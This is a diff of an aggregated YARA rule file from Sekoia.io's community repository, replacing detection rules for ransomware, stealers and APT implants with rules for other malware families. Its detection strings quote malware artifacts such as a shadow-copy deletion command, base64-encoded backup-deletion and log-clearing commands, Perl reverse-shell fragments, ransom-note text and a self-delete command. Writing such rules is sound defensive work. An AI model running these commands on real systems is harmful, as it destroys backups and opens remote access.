-		$str16 = "EdgeCryptoExtensions" ascii
-		$str17 = "ChromePasswordManagerExtensions" ascii
-		$str18 = "GeckoBrowserOptions" ascii
-		$str19 = "get_programFiles" ascii
+		$s1 = "eval(function(p, a, c, k, e, r) {"
+		$s2 = "|4d53"
+		$s3 = "ActiveXObject"
+		$x1 = " -F:* %1%"
+		$x2 = "&I /r c:\\"
+		$x3 = "ActiveXObject"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 15 of them
+		filesize < 2MB and ( all of ( $s* ) or all of ( $x* ) )
 }
-rule SEKOIA_Tool_Sharpefspotato_Strings : FILE
+rule SEKOIA_Implant_Lin_Lightning : FILE
 {
 	meta:
-		description = "Detects SharpEfsPotato based on strings"
+		description = "Detect the Lightning framework (Core & Downloader plugin)"
 		author = "Sekoia.io"
-		id = "4286c72b-c0b9-4d2c-9847-68fc39ed4894"
-		date = "2023-06-20"
+		id = "56f53e89-3b63-4ce7-a3c8-da0ba37246f1"
+		date = "2022-07-21"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_sharpefspotato_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4987b0d728472186a255adc1fba2d72288dd1f2b368212afd08ea8d7ff18e992"
+		reference = "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_lin_lightning.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "215eea8275fa69a901f6413b334d2824086098e9a9bb2cffd7cb9df5c869be4c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232762,26 +233429,33 @@ rule SEKOIA_Tool_Sharpefspotato_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Program to launch (default cmd.exe)" wide
-		$ = "[!] Cannot perform interception, necessary privileges missing." wide
-		$ = "[!] Failed to created impersonated process with token:" wide
-		$ = "No authenticated interception took place, exploit failed"
+		$ = "{\"ComputerName\":\"%s\",\"Guid\":\"%s\",\"RequestName\":\"%s\",\"Licence\":\"%s\"}"
+		$ = "kill -9 %s"
+		$ = "{%08X-%04X-%04X-%04X-%04X%04X%04X}"
+		$ = "sleep 60 && ./%s &"
+		$ = "cat /sys/class/net/%s/address"
+		$ = "/usr/bin/netstat"
+		$ = "/usr/bin/whoami"
+		$ = "/usr/bin/su"
+		$ = "dup2: %s"
+		$ = "Linux.Plugin.Kernel_%s"
+		$ = "Lightning"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them
+		uint32( 0 ) == 0x464c457f and 9 of them
 }
-rule SEKOIA_Ransomware_Win_Agenda : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_5 : FILE
 {
 	meta:
-		description = "Finds Agenda ransomware (aka Qilin) samples based on characteristic strings"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "b0ea8e69-8f29-452f-95f7-67ee0e545b66"
-		date = "2022-12-15"
+		id = "cb4d266e-f2b7-4642-a223-57180e66a9a6"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_agenda.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "7e315f639c4d785639bf7ed3bd805551366b4da10a664a42bf801c54c6f7bd2d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_sharpshooter_payload_5.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a68342b5bb2622deb71432da85cc249f35ca5b7b5dc70e069d6dcb6e9488e97e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232789,91 +233463,87 @@ rule SEKOIA_Ransomware_Win_Agenda : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str00 = "\"note\": \"-- Qilin" ascii
-		$str01 = "README-RECOVER-.txt" ascii
-		$str02 = "\"file_black_list\": [" ascii
-		$str03 = "\"file_pattern_black_list\": [" ascii
-		$str04 = "Encrypted files have new extension." ascii
-		$str05 = "We have downloaded compromising and sensitive data from you system/network" ascii
-		$str06 = "Employees personal dataCVsDLSSN." ascii
-		$str07 = "ueegj65kwr3v3sjhli73gjtmfnh2uqlte3vyg2kkyqq7cja2yx2ptaad.onion" ascii
-		$str08 = "cmdvssadmin.exe delete shadows /all /quiet" ascii
-		$str09 = "[WARNING] Removing shadows failed." ascii
-		$str10 = "[INFO] Shadow copies removed" ascii
-		$str11 = "[WARNING] net sahre enum failed with:" ascii
+		$ = "rc4 = function(key, str)"
+		$ = "<job id=\"JS Code\""
+		$ = "var e={},i,b=0,c,x,l=0,a,r="
+		$ = "var plain = rc4("
+		$ = "eval(plain);"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Generic_Perl_Reverse_Shell : FILE
+rule SEKOIA_Apt_Mustangpanda_Mqsttang_Qmagent : FILE
 {
 	meta:
-		description = "Detects simple reverse shell written in Perl"
+		description = "Detects specifics string of MQsTTang, also known as QMAGENT"
 		author = "Sekoia.io"
-		id = "4eb2ef0d-3ada-4566-bd82-8c75d6931acc"
-		date = "2023-12-08"
+		id = "bcf6f961-0d9b-4fbc-81d2-f5d00c68d4d5"
+		date = "2023-03-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_perl_reverse_shell.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d0a23db712746bac4684d6b4508dd891caf06d72af153b1a0ab489a93edbfaf4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustangpanda_mqsttang_qmagent.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4e7aa53e561cad512b031240bce6ad207b80ff7438eee39cd05bb92412aaa632"
 		score = 75
-		quality = 80
+		quality = 30
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "open(STDIN,\">&S\");"
-		$ = "open(STDERR,\">&S\");"
-		$ = "use Socket;$i="
+		$s1 = "iot/server"
+		$s2 = "QMQTT::Message"
+		$s3 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
+		$command1 = "c_topic"
+		$command2 = "Alive"
+		$command3 = "msg"
+		$command4 = "ret"
 
 	condition:
-		filesize < 300 and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
 }
-rule SEKOIA_Ransomware_Win_Dodo_2023 : FILE
+rule SEKOIA_Hacktool_Nbtscan_Strings : FILE
 {
 	meta:
-		description = "Rule to detect Dodo ransomware samples."
+		description = "Detects NBTScan hacktool based on strings, ELF & PE variants"
 		author = "Sekoia.io"
-		id = "190977d4-5a7a-4e15-8f90-085f82ec56c8"
-		date = "2023-02-13"
+		id = "8883b56c-a085-459c-9ec6-a139ad5a2671"
+		date = "2022-02-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_dodo_2023.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "01924360ef4bbecd220439290eba22838a3977793fdebd0ef0be74c342c0d152"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_nbtscan_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "87e4f5dd16ee29dfd23b70dccbc41b0ef40c2db28f42fbd7fd84e5e93ca5c943"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "aee45cc2540d49a28e765c30f1c4d0b853c1a74ea2260bd7614ece8e54c3bcb3"
 
 	strings:
-		$s1 = "DODOCRYPTER" ascii wide
-		$s2 = "dodov2" ascii wide
-		$s3 = "dodov2SPREAD.exe" ascii wide
-		$s4 = "dodov2_readit.txt" ascii wide
-		$s5 = "WELCOME, DODO has returned" ascii wide
-		$s6 = "Monero Address: 442n8nf9zojie1JdkZqxDQJFDumBEgZmVZozLdYd5jVPSMws2oUPvNLJKca6JKojyA7zDCZCnMyYnKbY1JLNsbzWK6HNNqW" ascii wide
-		$s7 = "The price for the software is $15. Payment can be made in Bitcoin or XMR." ascii wide
+		$ = "CHT:nfp:bt:vw:mVO:1P"
+		$ = "usage: %s [options] target [targets...]"
+		$ = "Targets are lists of IP addresses, DNS names, or address"
+		$ = "net bits [%d] must be 1..32"
+		$ = "subnet /%d is too large (%d max)"
+		$ = "[%s] is invalid IP address"
+		$ = "[%s] is an invalid target (bad IP/hostname)"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them
+		uint16be( 0 ) == 0x4d5a and 5 of them
 }
-rule SEKOIA_Apt_Ta410_Flowcloud_Rtti : FILE
+rule SEKOIA_Kimsuky_Konni_Dll : FILE
 {
 	meta:
-		description = "Detects FlowCloud via RTTI"
+		description = "Rule based on structure offset and file extension"
 		author = "Sekoia.io"
-		id = "c6a18c08-8b98-46d7-a6c3-dc171c7791ac"
-		date = "2022-10-11"
+		id = "6a20c492-e932-41bd-ac4a-01d35bfb0c49"
+		date = "2022-09-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_ta410_flowcloud_rtti.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "97f052c409c9b5de025d34180979cd4c322e67bab9f894d3b56c928340a6859b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/kimsuky_konni_dll.yar#L1-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "7099156decdfe35cde22958133d851479f12180fff7b5744af0c549ab8259636"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232881,25 +233551,36 @@ rule SEKOIA_Apt_Ta410_Flowcloud_Rtti : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$RTTI_1 = ".?AVdllloader@@" ascii fullword
-		$RTTI_2 = ".?AVel_cryptowrapper@@" ascii fullword
-		$RTTI_3 = ".?AVAntiVirusCheck@@" ascii fullword
+		$ext_1 = ".zip" wide ascii fullword
+		$ext_2 = ".cab" wide ascii fullword
+		$ext_3 = ".rar" wide ascii fullword
+		$ext_4 = ".ini" wide ascii fullword
+		$ext_5 = ".dat" wide ascii fullword
+		$offset_structure_1 = { 8d ?? 08 02 00 00 }
+		$offset_structure_2 = { 8d ?? 10 04 00 00 }
+		$offset_structure_3 = { 8d ?? 18 06 00 00 }
+		$offset_structure_4 = { 8d ?? 20 08 00 00 }
+		$offset_structure_5 = { 8d ?? 28 0a 00 00 }
+		$offset_structure_6 = { 89 ?? f8 11 00 00 }
+		$offset_structure_7 = { 8d ?? fc 11 00 00 }
+		$offset_structure_8 = { 89 ?? 0c 12 00 00 }
+		$offset_structure_9 = { 89 ?? 10 12 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 10MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 11MB and all of them
 }
-rule SEKOIA_Ransomware_Win_Redeemer : FILE
+rule SEKOIA_Apt_Polonium_Deepcreep_Strings : FILE
 {
 	meta:
-		description = "Finds Redeemer samples based on characteristic strings"
+		description = "Tries to detect POLONIUM's DeepCreep implant"
 		author = "Sekoia.io"
-		id = "ef94c1b0-d292-4fae-9801-4860e7347745"
-		date = "2022-12-09"
+		id = "b04af229-2bea-4ee8-9e17-8e4befa06e3a"
+		date = "2022-10-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_redeemer.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c1798a18e763277d19a3b698459244a2bc2eeebbbf239db7540d1493955ce5f0"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_polonium_deepcreep_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "60724d2eb964e2c3681b72bdb732ca640b603af7dc94b4eb6608c77cddb94011"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232907,57 +233588,53 @@ rule SEKOIA_Ransomware_Win_Redeemer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "RedeemerMutex" ascii
-		$str1 = "SOFTWARE\\Redeemer" ascii
-		$str2 = "-----BEGIN REDEEMER PUBLIC KEY-----" ascii
-		$str3 = "dnNzYWRtaW4gZGVsZXRlIHNoYWRvd3MgL0FsbCAvUXVpZXQ=" ascii
-		$str4 = "d2V2dHV0aWwgY2xlYXItbG9nIEFwcGxpY2F0aW9u" ascii
-		$str5 = "d2JhZG1pbiBkZWxldGUgc3lzdGVtc3RhdGViYWNrdXAgLWRlbGV0ZW9sZGVzdCAtcXVpZXQ=" ascii
-		$str6 = "YXNzb2MgLnJlZGVlbT1yZWRlZW1lcg==" ascii
-		$str7 = "UmVkZWVtZXIgUmFuc29td2FyZSAtIFlvdXIgRGF0YSBJcyBFbmNyeXB0ZWQ=" ascii
-		$str8 = "redeemer\\DefaultIcon" wide
-		$str9 = "\\Redeemer.sys" wide
+		$ = ";Invoke-Expression -Command '$shortcut =" ascii wide
+		$ = "CreateShortcut($c1" ascii wide
+		$ = "svchostdp.exe" ascii wide
+		$ = "HNlIC91IA==" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 3MB and 3 of them
 }
-rule SEKOIA_Apt_Cerana_Keeper_Yk0130 : FILE
+rule SEKOIA_Apt_Susp_Apt28_Uac0063_Hta_Loader
 {
 	meta:
-		description = "Detects YK0130 reverse shell"
+		description = "Detects some suspected APT28 HTA loader"
 		author = "Sekoia.io"
-		id = "3da898a9-68e7-472f-8478-a0243840ec0a"
-		date = "2024-10-04"
+		id = "8e1889c1-c6ac-4048-9d3a-99ccbbd5435f"
+		date = "2024-07-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_cerana_keeper_yk0130.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "2554e4864294dc96a5b4548dd42c7189"
-		logic_hash = "4462c6b7f46520207f49275292a3be873540becb593176d771d3489fba6f4cb0"
-		score = 75
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_susp_apt28_uac0063_hta_loader.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725"
+		logic_hash = "494331a8088d350e4e49e67fe64041d451886e501775413f908bd9b3faa98aeb"
+		score = 65
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$pdb = "C:\\Users\\admin\\source\\repos\\YK0130" ascii fullword
+		$ = "<HEAD><HTA:APPLICATION ID" ascii fullword
+		$ = "id=service>null</span" ascii fullword
+		$ = "script Language=\"VBScript.Encode" ascii fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and filesize < 300KB
+		2 of them
 }
-rule SEKOIA_Apt_Ta410_Flowcloud_Loader : FILE
+rule SEKOIA_Apt_Coathanger_Beacon : FILE
 {
 	meta:
-		description = "Detects FlowCloud Loader"
+		description = "Detects COATHANGER beacon"
 		author = "Sekoia.io"
-		id = "0a11dfa0-5a59-477b-baf6-6a777d020860"
-		date = "2024-05-27"
+		id = "cc201479-016a-46d2-a9e2-41b4914ce618"
+		date = "2024-02-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_ta410_flowcloud_loader.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "450cfdfbd9a42b623fc1acb55f3ea309ae54282b480edcb9495f4d45874d3922"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_coathanger_beacon.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e44496e62de8c885d5bd941819a97f4c0dd90ce2d0cfe9d042ab9590cc354ddb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232965,30 +233642,29 @@ rule SEKOIA_Apt_Ta410_Flowcloud_Loader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$decryption_function = {8A C8 80 C1 26 32 D1 30 14 38}
-		$derivation_key = {6B 04 00 00 F7 ?? 81 c2 a8 01 00 00}
-		$new_pattern_1 = {50 33 c0 58 74 01 e8}
-		$new_pattern_2 = {89 44 24 fc 58 8D 64
-        24 fc 81 fc 00 10 00
-        00 77 06 81 c4 ?? ??
-        ?? ?? 8B 44 24 FC}
-		$patch_bytes = {68 78 56 34 12 C3 90 90 90 90 90 00}
+		$ = {
+        48 B8 47 45 54 20 2F 20 48 54
+        48 89 45 B0 48 B8 54 50 2F 32 0A 48 6F 73
+        48 89 45 B8 48 B8 74 3A 20 77 77 77 2E 67
+        48 89 45 C0 48 B8 6F 6F 67 6C 65 2E 63 6F
+        }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 4MB and 2 of them
+		uint32( 0 ) == 0x464c457f and filesize < 5MB and any of them
 }
-rule SEKOIA_Apt_Badmagic_Commonmagic_Generic_2 : FILE
+rule SEKOIA_Infostealer_Win_Bebra : FILE
 {
 	meta:
-		description = "Detects CommonMagic related implants"
+		description = "Find samples of Bebra Stealer based on specific strings"
 		author = "Sekoia.io"
-		id = "c6a16ecc-e00a-4756-b603-f6c85e4f4220"
-		date = "2023-05-15"
+		id = "e84d04a7-1232-47e5-b797-ac8e56066796"
+		date = "2023-02-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_badmagic_commonmagic_generic_2.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d3916ab749ae5b6e0a8abdc9641de13e0328809a6e20c6ce04ada5dbfb742689"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_bebra.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "7841746c54c53dbcafdf3f357c7a84b90fe3b089e07f30dea15ef6f7f15b0f00"
+		logic_hash = "588fa3091f0dc565123c60d59479202d036e092499eca6204d420395ddc332f9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232996,58 +233672,61 @@ rule SEKOIA_Apt_Badmagic_Commonmagic_Generic_2 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\\CommonCommand\\" ascii wide
-		$ = "\\\\.\\pipe\\PipeMd" ascii wide fullword
-		$ = "\\\\.\\pipe\\PipeDtMd" ascii wide fullword
-		$ = "\\\\.\\pipe\\PipeCrDtMd" ascii wide fullword
+		$str01 = "https://studio.youtube.com/youtubei/v1/att/esr?alt=json&key=" ascii
+		$str02 = "https://www.youtube.com/getAccountSwitcher" ascii
+		$str03 = "\"challenge\":\"" ascii
+		$str04 = "\"botguardResponse\":\"" ascii
+		$str05 = "\"continueUrl\":\"https://studio.youtube.com/reauth\"," ascii
+		$str06 = "\"flow\":\"REAUTH_FLOW_YT_STUDIO_COLD_LOAD\"," ascii
+		$str07 = "\"xguardClientStatus\":0" ascii
+		$str08 = "SAPISIDHASH" ascii
+		$str09 = "system32\\cmd.exe /C choice /C Y /N /D Y /T 0 &Del" ascii
+		$str10 = "/new.php" ascii
+		$str11 = "github.com/mattn/go-sqlite3" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 2 of them
+		uint16( 0 ) == 0x5A4D and 9 of them
 }
-rule SEKOIA_Backdoor_Powershellempire_Csharp : FILE
+rule SEKOIA_Rat_Lin_Gobrat_2023 : FILE
 {
 	meta:
-		description = "Detects CSharp version of Empire"
+		description = "This rule detect samples that are downloaded on the GobRAT C2 URL path /a, /b and /c."
 		author = "Sekoia.io"
-		id = "952e8e9b-8e4d-4550-9cf4-7ffd2f9d0672"
-		date = "2022-04-15"
+		id = "ca36a586-f87f-445f-95dc-52d447c1d2a2"
+		date = "2023-06-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_powershellempire_csharp.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "536ef1167627c3dadb866d55e7eae2220c3fbd6961e2cfa71656656d984b9b90"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_lin_gobrat_2023.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b9831cefded9e48ef169aa56c18628a9871760ae613f75b232019b4798944e16"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "36cb17d9d118bd9692106c8aafab2462aacf1cdad3a6afb0e4f1de898a7db0e1"
+		hash2 = "28a714f7cec4445dbd507b85016c8e96ed5e378bcabe2e422c499975122b3f03"
+		hash3 = "1e80a084ab89da2375bc3cc2f5a37975edff709ef29a3fa2b4df4ccb6d5afe10"
 
 	strings:
-		$ = "[-] Catastrophic .Net Agent Failure, Attempting Agent Restart:" ascii wide
-		$ = "[!] Upload failed - No Delimiter" ascii wide
-		$ = "SELECT * FROM Win32_IP4RouteTable" ascii wide
-		$ = "no shell command supplied" ascii wide
-		$ = "[-] CmdletInvocationException:" ascii wide
-		$ = "[*] File download of" ascii wide
-		$ = "Script successfully saved in memory" ascii wide
-		$ = "Invoke-Empire" ascii wide
-		$ = "website to reach:" ascii wide
+		$s1 = "Z:/Go/awesomeProject3/main.go" wide ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 5 of them and filesize < 1MB
+		uint32( 0 ) == 0x464c457f and filesize < 4000KB and $s1
 }
-rule SEKOIA_Apt_Implant_Xdealer_Linux_Variant_Strings : FILE
+rule SEKOIA_Apt_Aptk47_Maliciouslnk : FILE
 {
 	meta:
-		description = "Detects XDealer linux variant"
+		description = "Detects APT-K-47 malicious LNK"
 		author = "Sekoia.io"
-		id = "42690513-753f-4296-b641-4d3b59a5e5e1"
-		date = "2024-03-22"
+		id = "2ccc8777-26fe-4018-9646-4ea91394fe78"
+		date = "2024-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_implant_xdealer_linux_variant_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "400beb53d0f7b7727962175c7c4f8dfccdfed56bb3978d3e847147e8ad7644fb"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_aptk47_maliciouslnk.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "6a405d4e88b4acb9706e19a83aad9cf6"
+		logic_hash = "865bb08f57affb3795853aa3c9f49577efb74df9b32e7760263b9fb08246a3ab"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -233055,29 +233734,25 @@ rule SEKOIA_Apt_Implant_Xdealer_Linux_Variant_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "ls -l /proc/%s/exe"
-		$ = "Linux_%s_%s_%u"
-		$ = "chkconfig --add"
-		$ = "cmd over return [%s]"
-		$ = "touch   -d"
-		$ = "%s can't be opened/n"
-		$ = "/proc/%s/status"
+		$ = "[/c for /f" wide
+		$ = "2^>nul') do copy" wide
+		$ = "%F in ('where /r %Temp%" wide
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and 3 of them and filesize < 1MB
+		uint32be( 0 ) == 0x4c000000 and all of them
 }
-rule SEKOIA_Infostealer_Win_Nekostealer : FILE
+rule SEKOIA_Apt_Mustangpanda_Windows_Remoteshell : FILE
 {
 	meta:
-		description = "Detect the NekoStealer infostealer based on specific strings"
+		description = "Detects Remote Shell of Mustang Panda by detecting internal structure intialization"
 		author = "Sekoia.io"
-		id = "8b7d2708-9d33-4855-8e02-f6afedb7dda8"
-		date = "2023-01-24"
+		id = "cffdd11e-9700-462e-a965-f9f51db63f0b"
+		date = "2022-12-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_nekostealer.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f027775bebb48ceb128392040ec2ac8ad84f2a2009760c040e4d376c2f06b663"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustangpanda_windows_remoteshell.yar#L1-L121"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4a72ae1574022d6454e29a6b05a0279f2e774f8218d24a3a866721d958c52e1a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -233085,85 +233760,160 @@ rule SEKOIA_Infostealer_Win_Nekostealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$nek = "NekoStealer.Stealing" ascii
-		$str01 = "\\Local Storage\\leveldb" wide
-		$str02 = "======================= Discord Tokens =======================" wide
-		$str03 = "======================== IP Information ========================" wide
-		$str04 = "https://ipapi.co/" wide
+		$chunk_1 = {
+        C7 45 ?? 0C 00 00 00
+        8D 4E ??
+        C6 01 03
+        8B 87 ?? ?? ?? ??
+        89 41 ??
+        66 8B 87 ?? ?? ?? ??
+        66 89 41 ??
+        }
+		$chunk_2 = {
+        C7 45 ?? 0C 00 00 00
+        8D 4E ??
+        C6 01 02
+        8B 87 ?? ?? ?? ??
+        89 41 ??
+        66 8B 87 ?? ?? ?? ??
+        66 89 41 ??
+        8B 45 ??
+        83 E8 05
+        50
+        51
+        E8 ?? ?? ?? ??
+        }
+		$chunk_3 = {
+        C7 87 ?? ?? ?? ?? 01 00 00 00
+        8D 4E ??
+        C7 45 ?? 0C 00 00 00
+        C6 01 04
